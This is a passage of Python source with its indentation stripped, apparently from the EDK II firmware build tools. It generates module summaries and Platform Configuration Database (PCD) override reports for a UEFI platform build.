self.Hash = self.Hash.hexdigest()
os.remove(Tempfile)
FileWrite(File, "Module Summary")
FileWrite(File, "Module Name: %s" % self.ModuleName)
FileWrite(File, "Module INF Path: %s" % self.ModuleInfPath)
FileWrite(File, "File GUID: %s" % self.FileGuid)
if self.Size:
FileWrite(File, "Size: 0x%X (%.2fK)" % (self.Size, self.Size / 1024.0))
if self.Hash:
FileWrite(File, "SHA1 HASH: %s *%s" % (self.Hash, self.ModuleName + ".efi"))
if self.BuildTimeStamp:
FileWrite(File, "Build Time Stamp: %s" % self.BuildTimeStamp)
if self.BuildTime:
FileWrite(File, "Module Build Time: %s" % self.BuildTime)
if self.DriverType:
FileWrite(File, "Driver Type: %s" % self.DriverType)
if self.UefiSpecVersion:
FileWrite(File, "UEFI Spec Version: %s" % self.UefiSpecVersion)
if self.PiSpecVersion:
FileWrite(File, "PI Spec Version: %s" % self.PiSpecVersion)
if self.PciDeviceId:
FileWrite(File, "PCI Device ID: %s" % self.PciDeviceId)
if self.PciVendorId:
FileWrite(File, "PCI Vendor ID: %s" % self.PciVendorId)
if self.PciClassCode:
FileWrite(File, "PCI Class Code: %s" % self.PciClassCode)
FileWrite(File, gSectionSep)
if "PCD" in ReportType:
GlobalPcdReport.GenerateReport(File, self.ModulePcdSet)
if "LIBRARY" in ReportType:
self.LibraryReport.GenerateReport(File)
if "DEPEX" in ReportType:
self.DepexReport.GenerateReport(File, GlobalDepexParser)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport.GenerateReport(File)
if "FIXED_ADDRESS" in ReportType and self.FileGuid:
GlobalPredictionReport.GenerateReport(File, self.FileGuid)
FileWrite(File, gSectionEnd)
def ReadMessage(From, To, ExitFlag):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line is not None and Line != "":
To(Line.rstrip())
else:
break
if ExitFlag.isSet():
break
##
# Reports platform and module PCD information
#
# This class reports the platform PCD section and module PCD subsection
# in the build report file.
#
class PcdReport(object):
##
# Constructor function for class PcdReport
#
# This constructor function generates PcdReport object a platform build.
# It collects the whole PCD database from platform DSC files, platform
# flash description file and package DEC files.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self.AllPcds = {}
self.UnusedPcds = {}
self.ConditionalPcds = {}
self.MaxLen = 0
self.Arch = None
if Wa.FdfProfile:
self.FdfPcdSet = Wa.FdfProfile.PcdDict
else:
self.FdfPcdSet = {}
self.DefaultStoreSingle = True
self.SkuSingle = True
if GlobalData.gDefaultStores and len(GlobalData.gDefaultStores) > 1:
self.DefaultStoreSingle = False
if GlobalData.gSkuids and len(GlobalData.gSkuids) > 1:
self.SkuSingle = False
self.ModulePcdOverride = {}
for Pa in Wa.AutoGenObjectList:
self.Arch = Pa.Arch
#
# Collect all platform referenced PCDs and grouped them by PCD token space
# GUID C Names
#
for Pcd in Pa.AllPcdList:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
#
# Collect the PCD defined in DSC/FDF file, but not used in module
#
UnusedPcdFullList = []
for item in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[item]
if not Pcd.Type:
# check the Pcd in FDF file, whether it is used in module first
for T in PCD_TYPE_LIST:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(T, [])
if Pcd in PcdList:
Pcd.Type = T
break
if not Pcd.Type:
PcdTypeFlag = False
for package in Pa.PackageList:
for T in PCD_TYPE_LIST:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T) in package.Pcds:
Pcd.Type = T
PcdTypeFlag = True
if not Pcd.DatumType:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T)].DatumType
break
if PcdTypeFlag:
break
if not Pcd.DatumType:
PcdType = Pcd.Type
# Try to remove Hii and Vpd suffix
if PcdType.startswith(TAB_PCDS_DYNAMIC_EX):
PcdType = TAB_PCDS_DYNAMIC_EX
elif PcdType.startswith(TAB_PCDS_DYNAMIC):
PcdType = TAB_PCDS_DYNAMIC
for package in Pa.PackageList:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType) in package.Pcds:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType)].DatumType
break
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
UnusedPcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd in UnusedPcdList:
UnusedPcdList.remove(Pcd)
if Pcd not in PcdList and Pcd not in UnusedPcdFullList:
UnusedPcdFullList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
if GlobalData.gConditionalPcds:
for PcdItem in GlobalData.gConditionalPcds:
if '.' in PcdItem:
(TokenSpaceGuidCName, TokenCName) = PcdItem.split('.')
if (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)]
PcdList = self.ConditionalPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
UnusedPcdList = []
if UnusedPcdFullList:
for Pcd in UnusedPcdFullList:
if Pcd.TokenSpaceGuidCName + '.' + Pcd.TokenCName in GlobalData.gConditionalPcds:
continue
UnusedPcdList.append(Pcd)
for Pcd in UnusedPcdList:
PcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
for Module in Pa.Platform.Modules.values():
#
# Collect module override PCDs
#
for ModulePcd in Module.M.ModulePcdList + Module.M.LibraryPcdList:
TokenCName = ModulePcd.TokenCName
TokenSpaceGuid = ModulePcd.TokenSpaceGuidCName
ModuleDefault = ModulePcd.DefaultValue
ModulePath = os.path.basename(Module.M.MetaFile.File)
self.ModulePcdOverride.setdefault((TokenCName, TokenSpaceGuid), {})[ModulePath] = ModuleDefault
#
# Collect PCD DEC default value.
#
self.DecPcdDefault = {}
self._GuidDict = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
Guids = Package.Guids
self._GuidDict.update(Guids)
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
self.DecPcdDefault.setdefault((TokenCName, TokenSpaceGuidCName, DecType), DecDefaultValue)
#
# Collect PCDs defined in DSC common section
#
self.DscPcdDefault = {}
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DscDefaultValue
if DscDefaultValue:
self.DscPcdDefault[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
def GenerateReport(self, File, ModulePcdSet):
if not ModulePcdSet:
if self.ConditionalPcds:
self.GenerateReportDetail(File, ModulePcdSet, 1)
if self.UnusedPcds:
IsEmpty = True
for Token in self.UnusedPcds:
TokenDict = self.UnusedPcds[Token]
for Type in TokenDict:
if TokenDict[Type]:
IsEmpty = False
break
if not IsEmpty:
break
if not IsEmpty:
self.GenerateReportDetail(File, ModulePcdSet, 2)
self.GenerateReportDetail(File, ModulePcdSet)
##
# Generate report for PCD information
#
# This function generates report for separate module expression
# in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param ModulePcdSet Set of all PCDs referenced by module or None for
# platform PCD report
# @param ReportySubType 0 means platform/module PCD report, 1 means Conditional
# directives section report, 2 means Unused Pcds section report
# @param DscOverridePcds Module DSC override PCDs set
#
def GenerateReportDetail(self, File, ModulePcdSet, ReportSubType = 0):
PcdDict = self.AllPcds
if ReportSubType == 1:
PcdDict = self.ConditionalPcds
elif ReportSubType == 2:
PcdDict = self.UnusedPcds
if not ModulePcdSet:
FileWrite(File, gSectionStart)
if ReportSubType == 1:
FileWrite(File, "Conditional Directives used by the build system")
elif ReportSubType == 2:
FileWrite(File, "PCDs not used by modules or in conditional directives")
else:
FileWrite(File, "Platform Configuration Database Report")
FileWrite(File, " *B - PCD override in the build option")
FileWrite(File, " *P - Platform scoped PCD override in DSC file")
FileWrite(File, " *F - Platform scoped PCD override in FDF file")
if not ReportSubType:
FileWrite(File, " *M - Module scoped PCD override")
FileWrite(File, gSectionSep)
else:
if not ReportSubType and ModulePcdSet:
#
# For module PCD sub-section
#
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_PCD)
FileWrite(File, gSubSectionSep)
AllPcdDict = {}
for Key in PcdDict:
AllPcdDict[Key] = {}
for Type in PcdDict[Key]:
for Pcd in PcdDict[Key][Type]:
AllPcdDict[Key][(Pcd.TokenCName, Type)] = Pcd
for Key in sorted(AllPcdDict):
#
# Group PCD by their token space GUID C Name
#
First = True
for PcdTokenCName, Type in sorted(AllPcdDict[Key]):
#
# Group PCD by their usage type
#
Pcd = AllPcdDict[Key][(PcdTokenCName, Type)]
TypeName, DecType = gPcdTypeMap.get(Type, ("", Type))
MixedPcdFlag = False
if GlobalData.MixedPcd:
for PcdKey in GlobalData.MixedPcd:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName) in GlobalData.MixedPcd[PcdKey]:
PcdTokenCName = PcdKey[0]
MixedPcdFlag = True
if MixedPcdFlag and not ModulePcdSet:
continue
#
# Get PCD default value and their override relationship
#
DecDefaultValue = self.DecPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, DecType))
DscDefaultValue = self.DscPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName))
DscDefaultValBak = DscDefaultValue
Field = ''
for (CName, Guid, Field) in self.FdfPcdSet:
if CName == PcdTokenCName and Guid == Key:
DscDefaultValue = self.FdfPcdSet[(CName, Guid, Field)]
break
if DscDefaultValue != DscDefaultValBak:
try:
DscDefaultValue = ValueExpressionEx(DscDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as DscDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" %(DscDefaultValue, Pcd.DatumType))
InfDefaultValue = None
PcdValue = DecDefaultValue
if DscDefaultValue:
PcdValue = DscDefaultValue
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if ModulePcdSet is not None:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type) not in ModulePcdSet:
continue
InfDefaultValue, PcdValue = ModulePcdSet[Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type]
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
if InfDefaultValue:
try:
InfDefaultValue = ValueExpressionEx(InfDefaultValue, Pcd.DatumType, self._GuidDict)(True)
except BadExpression as InfDefaultValue:
EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" % (InfDefaultValue, Pcd.DatumType))
if InfDefaultValue == "":
InfDefaultValue = None
BuildOptionMatch = False
if GlobalData.BuildOptionPcd:
for pcd in GlobalData.BuildOptionPcd:
if (Pcd.TokenSpaceGuidCName, Pcd.TokenCName) == (pcd[0], pcd[1]):
if pcd[2]:
continue
PcdValue = pcd[3]
#The DefaultValue of StructurePcd already be the latest, no need to update.
if not self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
Pcd.DefaultValue = PcdValue
BuildOptionMatch = True
break
if First:
if ModulePcdSet is None:
FileWrite(File, "")
FileWrite(File, Key)
First = False
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
PcdValueNumber = int(PcdValue.strip(), 0)
if DecDefaultValue is None:
DecMatch = True
else:
DecDefaultValueNumber = int(DecDefaultValue.strip(), 0)
DecMatch = (DecDefaultValueNumber == PcdValueNumber)
if InfDefaultValue is None:
InfMatch = True
else:
InfDefaultValueNumber = int(InfDefaultValue.strip(), 0)
InfMatch = (InfDefaultValueNumber == PcdValueNumber)
if DscDefaultValue is None:
DscMatch = True
else:
DscDefaultValueNumber = int(DscDefaultValue.strip(), 0)
DscMatch = (DscDefaultValueNumber == PcdValueNumber)
else:
if DecDefaultValue is None:
DecMatch = True
else:
DecMatch = (DecDefaultValue.strip() == PcdValue.strip())
if InfDefaultValue is None:
InfMatch = True
else:
InfMatch = (InfDefaultValue.strip() == PcdValue.strip())
if DscDefaultValue is None:
DscMatch = True
else:
DscMatch = (DscDefaultValue.strip() == PcdValue.strip())
IsStructure = False
if self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
IsStructure = True
if TypeName in ('DYNVPD', 'DEXVPD'):
SkuInfoList = Pcd.SkuInfoList
Pcd = GlobalData.gStructurePcd[self.Arch][(Pcd.TokenCName, Pcd.TokenSpaceGuidCName)]
Pcd.DatumType = Pcd.StructName
if TypeName in ('DYNVPD', 'DEXVPD'):
Pcd.SkuInfoList = SkuInfoList
if Pcd.PcdValueFromComm or Pcd.PcdFieldValueFromComm:
BuildOptionMatch = True
DecMatch = False
elif Pcd.PcdValueFromFdf or Pcd.PcdFieldValueFromFdf:
DscDefaultValue = True
DscMatch = True
DecMatch = False
elif Pcd.SkuOverrideValues:
DscOverride = False
if Pcd.DefaultFromDSC:
DscOverride = True
else:
DictLen = 0
for item in Pcd.SkuOverrideValues:
DictLen += len(Pcd.SkuOverrideValues[item])
if not DictLen:
DscOverride = False
else:
if not Pcd.SkuInfoList:
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
for Data in OverrideValues.values():
Struct = list(Data.values())
if Struct:
DscOverride = self.ParseStruct(Struct[0])
break
else:
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
if TypeName in ('DYNHII', 'DEXHII'):
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
OverrideValues = Pcd.SkuOverrideValues[Sku]
DscOverride = self.ParseStruct(OverrideValues[DefaultStore])
if DscOverride:
break
else:
OverrideValues = Pcd.SkuOverrideValues[Sku]
if OverrideValues:
Keys = list(OverrideValues.keys())
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
DscOverride = self.ParseStruct(OverrideFieldStruct)
if DscOverride:
break
if DscOverride:
DscDefaultValue = True
DscMatch = True
DecMatch = False
else:
DecMatch = True
else:
DscDefaultValue = True
DscMatch = True
DecMatch = False
#
# Report PCD item according to their override relationship
#
if Pcd.DatumType == 'BOOLEAN':
if DscDefaultValue:
DscDefaultValue = str(int(DscDefaultValue, 0))
if DecDefaultValue:
DecDefaultValue = str(int(DecDefaultValue, 0))
if InfDefaultValue:
InfDefaultValue = str(int(InfDefaultValue, 0))
if Pcd.DefaultValue:
Pcd.DefaultValue = str(int(Pcd.DefaultValue, 0))
if DecMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, ' ')
elif InfDefaultValue and InfMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
elif BuildOptionMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*B')
else:
if DscDefaultValue and DscMatch:
if (Pcd.TokenCName, Key, Field) in self.FdfPcdSet:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*F')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*P')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
if ModulePcdSet is None:
if IsStructure:
continue
if not TypeName in ('PATCH', 'FLAG', 'FIXED'):
continue
if not BuildOptionMatch:
ModuleOverride = self.ModulePcdOverride.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName), {})
for ModulePath in ModuleOverride:
ModuleDefault = ModuleOverride[ModulePath]
if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
ModulePcdDefaultValueNumber = int(ModuleDefault.strip(), 0)
Match = (ModulePcdDefaultValueNumber == PcdValueNumber)
if Pcd.DatumType == 'BOOLEAN':
ModuleDefault = str(ModulePcdDefaultValueNumber)
else:
Match = (ModuleDefault.strip() == PcdValue.strip())
if Match:
continue
IsByteArray, ArrayList = ByteArrayForamt(ModuleDefault.strip())
if IsByteArray:
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
Value = ModuleDefault.strip()
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, Value))
if ModulePcdSet is None:
FileWrite(File, gSectionEnd)
else:
if not ReportSubType and ModulePcdSet:
FileWrite(File, gSubSectionEnd)
def ParseStruct(self, struct):
HasDscOverride = False
if struct:
for _, Values in struct.items():
if Values[1] and Values[1].endswith('.dsc'):
HasDscOverride = True
break
return HasDscOverride
def PrintPcdDefault(self, File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue):
if not DscMatch and DscDefaultValue is not None:
Value = DscDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', Value))
if not InfMatch and InfDefaultValue is not None:
Value = InfDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', Value))
if not DecMatch and DecDefaultValue is not None:
Value = DecDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', Value))
if IsStructure:
self.PrintStructureInfo(File, Pcd.DefaultValues)
if DecMatch and IsStructure:
self.PrintStructureInfo(File, Pcd.DefaultValues)
def PrintPcdValue(self, File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, Flag = ' '):
if not Pcd.SkuInfoList:
Value = Pcd.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
if IsStructure:
FiledOverrideFlag = False
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
for Data in OverrideValues.values():
Struct = list(Data.values())
if Struct:
OverrideFieldStruct = self.OverrideFieldValue(Pcd, Struct[0])
self.PrintStructureInfo(File, OverrideFieldStruct)
FiledOverrideFlag = True
break
if not FiledOverrideFlag and (Pcd.PcdFieldValueFromComm or Pcd.PcdFieldValueFromFdf):
OverrideFieldStruct = self.OverrideFieldValue(Pcd, {})
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
FirstPrint = True
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
SkuIdName = SkuInfo.SkuIdName
if TypeName in ('DYNHII', 'DEXHII'):
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
Value = SkuInfo.DefaultStoreDict[DefaultStore]
IsByteArray, ArrayList = ByteArrayForamt(Value)
if Pcd.DatumType == 'BOOLEAN':
Value = str(int(Value, 0))
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
else:
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
FileWrite(File, '%*s: %s: %s' % (self.MaxLen + 4, SkuInfo.VariableGuid, SkuInfo.VariableName, SkuInfo.VariableOffset))
if IsStructure:
OverrideValues = Pcd.SkuOverrideValues[Sku]
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[DefaultStore])
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
Value = SkuInfo.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if Pcd.DatumType == 'BOOLEAN':
Value = str(int(Value, 0))
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
else:
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
if TypeName in ('DYNVPD', 'DEXVPD'):
FileWrite(File, '%*s' % (self.MaxLen + 4, SkuInfo.VpdOffset))
VPDPcdItem = (Pcd.TokenSpaceGuidCName + '.' + PcdTokenCName, SkuIdName, SkuInfo.VpdOffset, Pcd.MaxDatumSize, SkuInfo.DefaultValue)
if VPDPcdItem not in VPDPcdList:
VPDPcdList.append(VPDPcdItem)
if IsStructure:
FiledOverrideFlag = False
OverrideValues = Pcd.SkuOverrideValues[Sku]
if OverrideValues:
Keys = OverrideValues.keys()
